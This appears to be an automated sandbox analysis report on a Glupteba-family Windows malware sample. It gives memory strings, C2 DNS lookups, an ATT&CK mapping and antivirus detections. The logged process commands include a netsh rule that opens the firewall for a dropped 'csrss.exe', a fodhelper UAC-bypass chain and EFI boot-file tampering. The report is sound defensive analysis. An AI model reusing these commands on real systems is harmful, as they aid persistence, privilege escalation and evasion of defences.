            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
            Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmpBinary or memory string: tvmhgfsQ
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
            Source: svchost.exe, 00000002.00000002.546609399.00000286A1002000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exe@
            Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmpBinary or memory string: yvmciwavewildwB
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmpBinary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exexensvcxenvdb$
            Source: csrss.exe, 00000022.00000002.388262330.0000000005700000.00000040.00000001.sdmpBinary or memory string: +x@Y}main.isRunningInsideVMWare
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exesvchost.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesihost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exectfmon.exevmsrvc.exevmusrvc.exeexplorer.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeSearchUI.exesearchui.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeHxTsr.exehxtsr.exe$
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: sharedintapp.exe[system process]vmsrvc.exe
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: CoCreateInstanceConnectServerkernel32.dllGetUserDefaultLCIDoleaut32.dllExecQuerySysAllocStringLenShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exefontdrvhost.exevgauthservice.exefontdrvhost.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exedwm.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeMemory Compressionmemory compressionvgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevmmemctlvmusbmousevmx_svga\\.\HGFS\\.\vmci[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exesmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exe[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exe[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compression
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Performs DNS TXT record lookupsShow sources
            Source: TrafficDNS traffic detected: queries for: trumops.com
            Source: TrafficDNS traffic detected: queries for: logs.trumops.com
            Source: TrafficDNS traffic detected: queries for: f7873597-7b36-4441-9416-097456f134ae.uuid.trumops.com
            Source: TrafficDNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"Jump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yesJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5Jump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelperJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelperJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe" Jump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Uses netsh to modify the Windows network and firewall settingsShow sources
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            Changes security center settings (notifications, updates, antivirus, firewall)Show sources
            Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
            Modifies the windows firewallShow sources
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
            Source: svchost.exe, 00000008.00000002.547493168.000002364BB02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: svchost.exe, 00000008.00000002.546789573.000002364BA13000.00000004.00000001.sdmpBinary or memory string: \MsMpeng.exe

            Remote Access Functionality:

            barindex
            Yara detected Metasploit PayloadShow sources
            Source: Yara matchFile source: 16.2.csrss.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 50.2.csrss.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 34.2.csrss.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.4t4y4r89UZ.exe.4fd0e50.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 42.2.csrss.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 50.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 34.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.4t4y4r89UZ.exe.4fd0e50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 50.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 34.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.4t4y4r89UZ.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 42.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 34.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.4t4y4r89UZ.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 34.2.csrss.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.csrss.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.4t4y4r89UZ.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.csrss.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.csrss.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.4t4y4r89UZ.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.csrss.exe.5700e50.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 50.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 42.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.4t4y4r89UZ.exe.5040e50.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.3.4t4y4r89UZ.exe.5880000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.csrss.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.csrss.exe.5700e50.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.4t4y4r89UZ.exe.5040e50.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 42.2.csrss.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 50.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.4t4y4r89UZ.exe.58f0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 42.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002A.00000002.376433226.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000032.00000003.393407437.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.327032138.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.354921763.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000032.00000002.398055163.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.333119737.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.358520385.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002A.00000003.364603703.000000000638A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.388262330.0000000005700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000032.00000002.402547208.0000000005700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002A.00000002.387983179.0000000005700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.295699517.0000000005040000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.291152945.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.377614000.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.393659101.0000000005700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.321014783.0000000004FD0000.00000040.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation21Scheduled Task/Job1Process Injection12Masquerading331Credential API Hooking1Security Software Discovery241Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsCommand and Scripting Interpreter2Registry Run Keys / Startup Folder11Scheduled Task/Job1Disable or Modify Tools3LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsScheduled Task/Job1DLL Side-Loading1Registry Run Keys / Startup Folder11Virtualization/Sandbox Evasion2Security Account ManagerProcess Discovery12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)DLL Side-Loading1Process Injection12NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol25SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information11Cached Domain CredentialsSystem Information Discovery24VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing211DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 519673 Sample: 4t4y4r89UZ Startdate: 11/11/2021 Architecture: WINDOWS Score: 100 94 Antivirus detection for URL or domain 2->94 96 Antivirus detection for dropped file 2->96 98 Multi AV Scanner detection for dropped file 2->98 100 10 other signatures 2->100 9 4t4y4r89UZ.exe 16 2->9         started        12 csrss.exe 2 2->12         started        14 svchost.exe 2->14         started        16 11 other processes 2->16 process3 signatures4 106 Detected unpacking (changes PE section rights) 9->106 108 Detected unpacking (overwrites its own PE header) 9->108 110 Modifies the windows firewall 9->110 112 Drops PE files with benign system names 9->112 18 4t4y4r89UZ.exe 11 2 9->18         started        22 cmd.exe 2 12->22         started        114 Changes security center settings (notifications, updates, antivirus, firewall) 14->114 24 cmd.exe 16->24         started        process5 file6 78 C:\Windows\rss\csrss.exe, PE32 18->78 dropped 102 Creates an autostart registry key pointing to binary in C:\Windows 18->102 26 csrss.exe 4 8 18->26         started        31 cmd.exe 1 18->31         started        33 fodhelper.exe 22->33         started        35 conhost.exe 22->35         started        37 fodhelper.exe 22->37         started        39 fodhelper.exe 22->39         started        41 conhost.exe 24->41         started        43 fodhelper.exe 24->43         started        45 fodhelper.exe 24->45         started        signatures7 process8 dnsIp9 88 runmodes.com 104.21.34.203, 443, 49747, 49749 CLOUDFLARENETUS United States 26->88 90 server8.trumops.com 104.21.79.9, 443, 49748, 49750 CLOUDFLARENETUS United States 26->90 92 7 other IPs or domains 26->92 80 C:\Windows\windefender.exe, PE32 26->80 dropped 82 C:\Users\user\AppData\Local\...\injector.exe, PE32+ 26->82 dropped 84 C:\Users\...84tQuerySystemInformationHook.dll, PE32+ 26->84 dropped 86 5 other files (none is malicious) 26->86 dropped 116 Multi AV Scanner detection for dropped file 26->116 118 Detected unpacking (changes PE section rights) 26->118 120 Detected unpacking (overwrites its own PE header) 26->120 126 3 other signatures 26->126 47 schtasks.exe 1 26->47         started        49 schtasks.exe 1 26->49         started        51 mountvol.exe 1 26->51         started        60 4 other processes 26->60 122 Uses netsh to modify the Windows network and firewall settings 31->122 53 netsh.exe 3 31->53         started        56 conhost.exe 31->56         started        124 Drops executables to the windows directory (C:\Windows) and starts them 33->124 58 csrss.exe 33->58         started        file10 signatures11 process12 signatures13 62 conhost.exe 47->62         started        64 conhost.exe 49->64         started        66 conhost.exe 51->66         started        104 Creates files in the system32 config directory 53->104 68 csrss.exe 56->68         started        70 conhost.exe 60->70         started        72 conhost.exe 60->72         started        74 conhost.exe 60->74         started        76 conhost.exe 60->76         started        process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            4t4y4r89UZ.exe33%VirustotalBrowse
            4t4y4r89UZ.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe100%AviraTR/Agent.twerk
            C:\Windows\windefender.exe100%AviraTR/Crypt.XPACK.eocey
            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll100%AviraTR/Redcap.gsjan
            C:\Windows\rss\csrss.exe100%Joe Sandbox ML
            B:\EFI\Boot\old.efi (copy)0%ReversingLabs
            B:\EFI\Microsoft\Boot\fw.efi (copy)0%ReversingLabs
            C:\EFI\Boot\EfiGuardDxe.efi0%ReversingLabs
            C:\EFI\Boot\bootx64.efi0%ReversingLabs
            C:\EFI\Microsoft\Boot\bootmgfw.efi0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll46%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll59%ReversingLabsWin64.Trojan.Glupject
            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe14%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe73%ReversingLabsWin64.Trojan.Glupteba
            C:\Windows\rss\csrss.exe39%ReversingLabsWin32.Trojan.Ulise
            C:\Windows\windefender.exe29%MetadefenderBrowse
            C:\Windows\windefender.exe79%ReversingLabsWin32.Trojan.WinGoRanumBot

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            14.3.csrss.exe.1694ea00.16.unpack100%AviraTR/Patched.Ren.GenDownload File
            14.2.csrss.exe.16c44000.16.unpack100%AviraTR/Patched.Ren.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://retoti.comidentifier0%Avira URL Cloudsafe
            https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta0%Avira URL Cloudsafe
